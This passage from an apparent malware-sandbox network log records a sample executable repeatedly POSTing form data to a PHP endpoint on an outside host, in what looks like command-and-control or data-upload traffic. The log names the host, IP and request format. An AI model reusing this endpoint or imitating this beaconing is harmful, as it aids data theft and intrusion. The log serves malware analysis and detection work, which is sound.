Aug 21, 2024 10:04:02.435986042 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.7 | 53014 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:04:02.556639910 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    59 | 192.168.2.7 | 53015 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:03.105993986 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:03.779587984 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:03.909708023 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    60 | 192.168.2.7 | 53016 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:03.226885080 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:03.899909019 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:04.029611111 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    61 | 192.168.2.7 | 53017 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:04.149897099 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:04.823180914 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:04.953903913 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    62 | 192.168.2.7 | 53018 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:05.087222099 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:06.081064939 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:06.081118107 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
                                                                    Aug 21, 2024 10:04:06.081173897 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    63 | 192.168.2.7 | 53019 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:06.212253094 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:07.873039007 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:08.001137018 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    64 | 192.168.2.7 | 53020 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:08.135761023 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:08.807909966 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    65 | 192.168.2.7 | 53022 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:08.918359995 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:09.584654093 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:09.715143919 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    66 | 192.168.2.7 | 53023 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:09.062583923 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:09.736898899 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:09.865410089 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    67 | 192.168.2.7 | 53025 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:10.105866909 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2536
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:10.792354107 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:10.921400070 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    68 | 192.168.2.7 | 53026 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:11.056025028 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:11.719397068 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:11.847393036 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    69 | 192.168.2.7 | 53027 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:11.983468056 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2536
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:12.649255037 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:12.847677946 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.7 | 53028 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:04:12.977318048 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
Aug 21, 2024 10:04:13.633814096 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:04:13.761475086 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.7 | 53030 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:04:14.093946934 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
Aug 21, 2024 10:04:14.748673916 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:04:14.877492905 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.7 | 53031 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:04:14.731683969 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
Aug 21, 2024 10:04:15.409902096 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:04:15.541707039 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.7 | 53032 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:04:15.008774042 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2536
                                                                    Expect: 100-continue
Aug 21, 2024 10:04:15.668579102 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:04:15.878741980 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.7 | 53033 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:04:16.007853985 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
Aug 21, 2024 10:04:16.665746927 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:04:16.794998884 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.7 | 53034 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:04:17.107692003 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
Aug 21, 2024 10:04:18.747306108 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:04:18.748070955 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
Aug 21, 2024 10:04:18.748153925 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
Aug 21, 2024 10:04:18.748768091 CEST | 183 | IN | HTTP/1.1 100 Continue
                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Wed, 21 Aug 2024 08:04:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive;U_[
Aug 21, 2024 10:04:18.749412060 CEST | 183 | IN | HTTP/1.1 100 Continue
                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Wed, 21 Aug 2024 08:04:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.7 | 53035 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:04:18.868534088 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
Aug 21, 2024 10:04:19.531100988 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:04:19.918987989 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
Aug 21, 2024 10:04:19.944878101 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.7 | 53036 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:04:20.040838003 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.7 | 53037 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:04:20.582236052 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
Aug 21, 2024 10:04:21.237097025 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:04:21.365623951 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.7 | 53038 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:04:20.771802902 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:21.474334002 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:21.609325886 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    80 | 192.168.2.7 | 53039 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:21.742970943 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:23.208652973 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:23.208884954 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:23.209095001 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:23.799643993 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    81 | 192.168.2.7 | 53040 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:23.933182955 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:24.662587881 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:24.964374065 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    82 | 192.168.2.7 | 53041 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:25.085985899 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
